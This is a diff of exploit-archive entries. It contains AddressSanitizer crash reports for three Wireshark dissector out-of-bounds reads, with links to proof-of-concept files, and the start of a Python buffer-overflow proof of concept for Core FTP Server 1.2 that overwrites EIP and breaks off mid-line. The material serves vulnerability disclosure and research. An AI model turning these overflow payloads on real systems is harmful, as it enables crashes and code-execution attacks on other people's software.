+ 0x0feedb623c30: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
+ 0x0feedb623c40: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 00 00 00 00
+ 0x0feedb623c50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+Shadow byte legend (one shadow byte represents 8 application bytes):
+ Addressable: 00
+ Partially addressable: 01 02 03 04 05 06 07
+ Heap left redzone: fa
+ Heap right redzone: fb
+ Freed heap region: fd
+ Stack left redzone: f1
+ Stack mid redzone: f2
+ Stack right redzone: f3
+ Stack partial redzone: f4
+ Stack after return: f5
+ Stack use after scope: f8
+ Global redzone: f9
+ Global init order: f6
+ Poisoned by user: f7
+ Container overflow: fc
+ Array cookie: ac
+ Intra object redzone: bb
+ ASan internal: fe
+ Left alloca redzone: ca
+ Right alloca redzone: cb
+==5092==ABORTING
+--- cut ---
+
+The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11825. Attached are three files which trigger the crash.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39482.zip
+
diff --git a/platforms/multiple/dos/39483.txt b/platforms/multiple/dos/39483.txt
new file mode 100755
index 000000000..8c073868c
--- /dev/null
+++ b/platforms/multiple/dos/39483.txt
@@ -0,0 +1,74 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=654
+
+The following crash due to an out-of-bounds read from static memory can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
+
+--- cut ---
+==32475==ERROR: AddressSanitizer: global-buffer-overflow on address 0x7fd688698b10 at pc 0x7fd685351320 bp 0x7ffd862371a0 sp 0x7ffd86237198
+READ of size 4 at 0x7fd688698b10 thread T0
+ #0 0x7fd68535131f in add_ff_vht_compressed_beamforming_report wireshark/epan/dissectors/packet-ieee80211.c:9143:8
+ #1 0x7fd68534746f in add_ff_action_vht wireshark/epan/dissectors/packet-ieee80211.c:9199:16
+ #2 0x7fd68533f813 in add_ff_action wireshark/epan/dissectors/packet-ieee80211.c:9426:12
+ #3 0x7fd685324811 in add_fixed_field wireshark/epan/dissectors/packet-ieee80211.c:9566:14
+ #4 0x7fd68536ebae in dissect_ieee80211_mgt wireshark/epan/dissectors/packet-ieee80211.c:16388:17
+ #5 0x7fd685368cce in dissect_ieee80211_common wireshark/epan/dissectors/packet-ieee80211.c:18218:7
+ #6 0x7fd685338dae in dissect_ieee80211 wireshark/epan/dissectors/packet-ieee80211.c:18375:10
+ #7 0x7fd6842c7cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
+ #8 0x7fd6842ba5ea in call_dissector_work wireshark/epan/packet.c:691:9
+ #9 0x7fd6842b9dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
+ #10 0x7fd684fc95f6 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11
+ #11 0x7fd6842c7cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
+ #12 0x7fd6842ba5ea in call_dissector_work wireshark/epan/packet.c:691:9
+ #13 0x7fd6842c42be in call_dissector_only wireshark/epan/packet.c:2662:8
+ #14 0x7fd6842b5ccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
+ #15 0x7fd6842b533b in dissect_record wireshark/epan/packet.c:501:3
+ #16 0x7fd6842633c9 in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2
+ #17 0x5264eb in process_packet wireshark/tshark.c:3728:5
+ #18 0x51f960 in load_cap_file wireshark/tshark.c:3484:11
+ #19 0x515daf in main wireshark/tshark.c:2197:13
+
+0x7fd688698b10 is located 48 bytes to the left of global variable '' defined in 'packet-ieee80211.c:9115:70' (0x7fd688698b40) of size 30
+ '' is ascii string 'Average Signal to Noise Ratio'
+0x7fd688698b10 is located 0 bytes to the right of global variable 'ns_arr' defined in 'packet-ieee80211.c:9091:20' (0x7fd688698ae0) of size 48
+SUMMARY: AddressSanitizer: global-buffer-overflow wireshark/epan/dissectors/packet-ieee80211.c:9143:8 in add_ff_vht_compressed_beamforming_report
+Shadow bytes around the buggy address:
+ 0x0ffb510cb110: f9 f9 f9 f9 00 00 00 00 00 00 04 f9 f9 f9 f9 f9
+ 0x0ffb510cb120: 00 00 00 07 f9 f9 f9 f9 00 00 07 f9 f9 f9 f9 f9
+ 0x0ffb510cb130: 00 00 06 f9 f9 f9 f9 f9 00 00 00 00 00 03 f9 f9
+ 0x0ffb510cb140: f9 f9 f9 f9 00 00 00 00 00 02 f9 f9 f9 f9 f9 f9
+ 0x0ffb510cb150: 00 00 00 00 00 00 00 00 f9 f9 f9 f9 00 00 00 00
+=>0x0ffb510cb160: 00 00[f9]f9 f9 f9 f9 f9 00 00 00 06 f9 f9 f9 f9
+ 0x0ffb510cb170: 00 00 00 05 f9 f9 f9 f9 00 00 00 00 00 00 00 01
+ 0x0ffb510cb180: f9 f9 f9 f9 00 00 04 f9 f9 f9 f9 f9 00 00 03 f9
+ 0x0ffb510cb190: f9 f9 f9 f9 00 00 00 07 f9 f9 f9 f9 00 00 00 00
+ 0x0ffb510cb1a0: 00 00 00 00 00 00 00 00 00 02 f9 f9 f9 f9 f9 f9
+ 0x0ffb510cb1b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 f9 f9 f9
+Shadow byte legend (one shadow byte represents 8 application bytes):
+ Addressable: 00
+ Partially addressable: 01 02 03 04 05 06 07
+ Heap left redzone: fa
+ Heap right redzone: fb
+ Freed heap region: fd
+ Stack left redzone: f1
+ Stack mid redzone: f2
+ Stack right redzone: f3
+ Stack partial redzone: f4
+ Stack after return: f5
+ Stack use after scope: f8
+ Global redzone: f9
+ Global init order: f6
+ Poisoned by user: f7
+ Container overflow: fc
+ Array cookie: ac
+ Intra object redzone: bb
+ ASan internal: fe
+ Left alloca redzone: ca
+ Right alloca redzone: cb
+==32475==ABORTING
+--- cut ---
+
+The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11818. Attached are three files which trigger the crash.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39483.zip
+
diff --git a/platforms/multiple/dos/39484.txt b/platforms/multiple/dos/39484.txt
new file mode 100755
index 000000000..e1e9ca57c
--- /dev/null
+++ b/platforms/multiple/dos/39484.txt
@@ -0,0 +1,141 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=648
+
+The following crash due to a static out-of-bounds read can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
+
+--- cut ---
+==7855==ERROR: AddressSanitizer: global-buffer-overflow on address 0x000005676c18 at pc 0x000001ab09d2 bp 0x7ffc9ce376b0 sp 0x7ffc9ce376a8
+READ of size 8 at 0x000005676c18 thread T0
+ #0 0x1ab09d1 in dissect_ber_set wireshark/epan/dissectors/packet-ber.c:2588:64
+ #1 0x198e7c7 in dissect_ansi_tcap_T_paramSet wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:189:12
+ #2 0x1ab47f4 in dissect_ber_choice wireshark/epan/dissectors/packet-ber.c:2898:21
+ #3 0x198e652 in dissect_ansi_tcap_T_parameter_03 wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:210:12
+ #4 0x1aae8bc in dissect_ber_sequence wireshark/epan/dissectors/packet-ber.c:2400:17
+ #5 0x198b2f7 in dissect_ansi_tcap_Reject wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:227:12
+ #6 0x1ab47f4 in dissect_ber_choice wireshark/epan/dissectors/packet-ber.c:2898:21
+ #7 0x198aee2 in dissect_ansi_tcap_ComponentPDU wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:256:12
+ #8 0x1abba52 in dissect_ber_sq_of wireshark/epan/dissectors/packet-ber.c:3490:9
+ #9 0x1abbe2f in dissect_ber_sequence_of wireshark/epan/dissectors/packet-ber.c:3521:12
+ #10 0x198ae17 in dissect_ansi_tcap_SEQUENCE_OF_ComponentPDU wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:270:12
+ #11 0x1a966a7 in dissect_ber_tagged_type wireshark/epan/dissectors/packet-ber.c:691:9
+ #12 0x19898ac in dissect_ansi_tcap_ComponentSequence wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:280:12
+ #13 0x1aae8bc in dissect_ber_sequence wireshark/epan/dissectors/packet-ber.c:2400:17
+ #14 0x198e887 in dissect_ansi_tcap_TransactionPDU wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:145:12
+ #15 0x1988ded in dissect_ansi_tcap_T_queryWithPerm wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:134:12
+ #16 0x1ab47f4 in dissect_ber_choice wireshark/epan/dissectors/packet-ber.c:2898:21
+ #17 0x1988b30 in dissect_ansi_tcap_PackageType wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:173:12
+ #18 0x1988830 in dissect_ansi_tcap wireshark/epan/dissectors/../../asn1/ansi_tcap/packet-ansi_tcap-template.c:385:5
+ #19 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
+ #20 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
+ #21 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8
+ #22 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8
+ #23 0xaefba8 in call_dissector wireshark/epan/packet.c:2692:9
+ #24 0x16c3f24 in dissect_tcap wireshark/epan/dissectors/../../asn1/tcap/packet-tcap-template.c:2004:14
+ #25 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
+ #26 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
+ #27 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
+ #28 0x11d6632 in dissect_sccp_data_param wireshark/epan/dissectors/packet-sccp.c:2346:31
+ #29 0x11d47a1 in dissect_sccp_parameter wireshark/epan/dissectors/packet-sccp.c:2559:5
+ #30 0x11d5169 in dissect_sccp_variable_parameter wireshark/epan/dissectors/packet-sccp.c:2640:3
+ #31 0x11cec1e in dissect_sccp_message wireshark/epan/dissectors/packet-sccp.c:2951:5
+ #32 0x11cc3f9 in dissect_sccp wireshark/epan/dissectors/packet-sccp.c:3402:3
+ #33 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
+ #34 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
+ #35 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
+ #36 0xae5a38 in dissector_try_uint wireshark/epan/packet.c:1174:9
+ #37 0xefae51 in dissect_mtp3_payload wireshark/epan/dissectors/packet-mtp3.c:647:8
+ #38 0xef8466 in dissect_mtp3 wireshark/epan/dissectors/packet-mtp3.c:767:3
+ #39 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
+ #40 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
+ #41 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8
+ #42 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8
+ #43 0xaefba8 in call_dissector wireshark/epan/packet.c:2692:9
+ #44 0x2da26b4 in dissect_protocol_data_1_parameter wireshark/epan/dissectors/packet-m2ua.c:507:3
+ #45 0x2da11b2 in dissect_parameter wireshark/epan/dissectors/packet-m2ua.c:952:5
+ #46 0x2da006b in dissect_parameters wireshark/epan/dissectors/packet-m2ua.c:1026:5
+ #47 0x2d9fb58 in dissect_message wireshark/epan/dissectors/packet-m2ua.c:1041:3
+ #48 0x2d9fa96 in dissect_m2ua wireshark/epan/dissectors/packet-m2ua.c:1058:3
+ #49 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
+ #50 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
+ #51 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
+ #52 0x39012a2 in dissect_payload wireshark/epan/dissectors/packet-sctp.c:2517:9
+ #53 0x38f7d37 in dissect_data_chunk wireshark/epan/dissectors/packet-sctp.c:3443:16
+ #54 0x38f0ac8 in dissect_sctp_chunk wireshark/epan/dissectors/packet-sctp.c:4360:14
+ #55 0x38ed8e6 in dissect_sctp_chunks wireshark/epan/dissectors/packet-sctp.c:4515:9
+ #56 0x38eb79f in dissect_sctp_packet wireshark/epan/dissectors/packet-sctp.c:4678:3
+ #57 0x38e95d5 in dissect_sctp wireshark/epan/dissectors/packet-sctp.c:4732:3
+ #58 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
+ #59 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
+ #60 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
+ #61 0x29c5318 in ip_try_dissect wireshark/epan/dissectors/packet-ip.c:2001:7
+ #62 0x29d0521 in dissect_ip_v4 wireshark/epan/dissectors/packet-ip.c:2485:10
+ #63 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
+ #64 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
+ #65 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
+ #66 0xae5a38 in dissector_try_uint wireshark/epan/packet.c:1174:9
+ #67 0x24e0824 in dissect_ethertype wireshark/epan/dissectors/packet-ethertype.c:307:21
+ #68 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
+ #69 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
+ #70 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8
+ #71 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8
+ #72 0x24dc752 in dissect_eth_common wireshark/epan/dissectors/packet-eth.c:545:5
+ #73 0x24d499a in dissect_eth_maybefcs wireshark/epan/dissectors/packet-eth.c:828:5
+ #74 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
+ #75 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
+ #76 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
+ #77 0x25dca12 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11
+ #78 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
+ #79 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
+ #80 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8
+ #81 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8
+ #82 0xadffde in dissect_record wireshark/epan/packet.c:501:3
+ #83 0xab6d0d in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2
+ #84 0x53c91b in process_packet wireshark/tshark.c:3728:5
+ #85 0x535d90 in load_cap_file wireshark/tshark.c:3484:11
+ #86 0x52c1df in main wireshark/tshark.c:2197:13
+
+0x000005676c18 is located 8 bytes to the left of global variable '' defined in '../../asn1/ansi_tcap/ansi_tcap.cnf:131:43' (0x5676c20) of size 15
+ '' is ascii string 'queryWithPerm '
+0x000005676c18 is located 24 bytes to the right of global variable 'T_paramSet_set' defined in '../../asn1/ansi_tcap/ansi_tcap.cnf:183:29' (0x5676be0) of size 32
+SUMMARY: AddressSanitizer: global-buffer-overflow wireshark/epan/dissectors/packet-ber.c:2588:64 in dissect_ber_set
+Shadow bytes around the buggy address:
+ 0x000080ac6d30: 00 00 00 00 f9 f9 f9 f9 00 00 00 00 00 00 00 00
+ 0x000080ac6d40: 00 00 00 00 00 00 00 f9 f9 f9 f9 f9 00 00 00 00
+ 0x000080ac6d50: 00 00 00 00 00 00 00 00 00 00 00 00 f9 f9 f9 f9
+ 0x000080ac6d60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f9
+ 0x000080ac6d70: f9 f9 f9 f9 00 00 00 00 f9 f9 f9 f9 00 00 00 00
+=>0x000080ac6d80: f9 f9 f9[f9]00 07 f9 f9 f9 f9 f9 f9 00 00 00 00
+ 0x000080ac6d90: 00 00 00 00 00 00 00 00 00 00 00 00 f9 f9 f9 f9
+ 0x000080ac6da0: 00 00 02 f9 f9 f9 f9 f9 00 02 f9 f9 f9 f9 f9 f9
+ 0x000080ac6db0: 00 00 06 f9 f9 f9 f9 f9 00 00 00 01 f9 f9 f9 f9
+ 0x000080ac6dc0: 07 f9 f9 f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00
+ 0x000080ac6dd0: 00 00 00 00 00 00 00 00 f9 f9 f9 f9 00 00 00 00
+Shadow byte legend (one shadow byte represents 8 application bytes):
+ Addressable: 00
+ Partially addressable: 01 02 03 04 05 06 07
+ Heap left redzone: fa
+ Heap right redzone: fb
+ Freed heap region: fd
+ Stack left redzone: f1
+ Stack mid redzone: f2
+ Stack right redzone: f3
+ Stack partial redzone: f4
+ Stack after return: f5
+ Stack use after scope: f8
+ Global redzone: f9
+ Global init order: f6
+ Poisoned by user: f7
+ Container overflow: fc
+ Array cookie: ac
+ Intra object redzone: bb
+ ASan internal: fe
+ Left alloca redzone: ca
+ Right alloca redzone: cb
+==7855==ABORTING
+--- cut ---
+
+The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11796. Attached are three files which trigger the crash.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39484.zip
+
diff --git a/platforms/windows/local/39480.py b/platforms/windows/local/39480.py
new file mode 100755
index 000000000..c9330a848
--- /dev/null
+++ b/platforms/windows/local/39480.py
@@ -0,0 +1,77 @@
+#-*- coding: utf-8 -*-
+#
+# Exploit Title : Core FTP Server v1.2 - BufferOverflow POC
+# Date: 2016-02-22
+# Author: INSECT.B
+# Facebook : https://www.facebook.com/B.INSECT00
+# GitHub : binsect00
+# Blog : http://binsect00.tistory.com
+# Vendor Homepage : http://www.coreftp.com/
+# Software Link:
+# Version: 1.2
+# Tested on: Windows7 Professional SP1 En x86
+# CVE : N/A
+
+'''
+[+] Type : Buffer overflow
+[+] Detail :
+[-] The vulnerability has the most typical Buffer overflow vulnerabilities.
+[-] Insert string into 'Log filename(include path)' field that [setup] - [new] - [Logging options] - [More]
+[-] 'Log filename(include path)' field is no limit to the length and does not check the length
+[-] Insert string "A"*1500 and press Ok, OK
+[-] crash info
+(3bc.e28): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+eax=00000000 ebx=00000111 ecx=41414141 edx=0012a3d9 esi=00502438 edi=00000001
+eip=41414141 esp=00129bf0 ebp=00129bf8 iopl=0 nv up ei pl nz na po nc
+cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
+41414141 ?? ???
+'''
+import struct
+
+junk = "A" * 312
+EIP = struct.pack("